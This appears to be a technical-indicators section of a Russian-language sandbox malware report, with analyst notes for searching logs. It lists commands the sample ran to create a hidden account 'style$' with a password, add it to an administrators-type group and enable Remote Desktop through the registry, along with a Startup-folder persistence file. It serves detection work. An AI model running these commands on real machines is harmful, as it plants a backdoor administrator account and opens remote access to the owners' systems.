Техническая информация
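- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s style$ /add
  (Примечание: «%USERNAME%s», вероятно, артефакт нормализации отчёта: имя пользователя песочницы внутри названия группы заменено на %USERNAME% (предположительно, исходно «Administrators»). При поиске по журналам ориентируйтесь на добавление учётной записи style$ в локальную группу.)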
- '<SYSTEM32>\DrvInst.exe' "1" "200" "UMB\UMB\1&841921d&0&TSBUS" "" "" "69f6e7ccb" "00000000" "00000550" "000003B4"
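- '<SYSTEM32>\REG.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  (Примечание: кавычки вокруг пробела приведены так, как они записаны в командной строке; речь идёт о ключе «HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server». Значение fDenyTSConnections = 0 разрешает входящие подключения к удалённому рабочему столу.)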
- '<SYSTEM32>\net1.exe' user style$ www.hk##33.com /add
- <SYSTEM32>\Microsoft\Protect\S-1-5-20\0569b4d6-dfee-48d2-aeac-4cee33480646
- <SYSTEM32>\Microsoft\Protect\S-1-5-20\Preferred
- C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\f686aace6942fb7f7ceb231212eef4a4_97c09787-6498-4b10-8f65-9471d842c55e
- %WINDIR%\sdqlyk \EEEEEEEEEEEEEEEEEE
- %TEMP%\6e10b.tmp
- %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adb.url
- %APPDATA%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adb.url
- %TEMP%\6e10b.tmp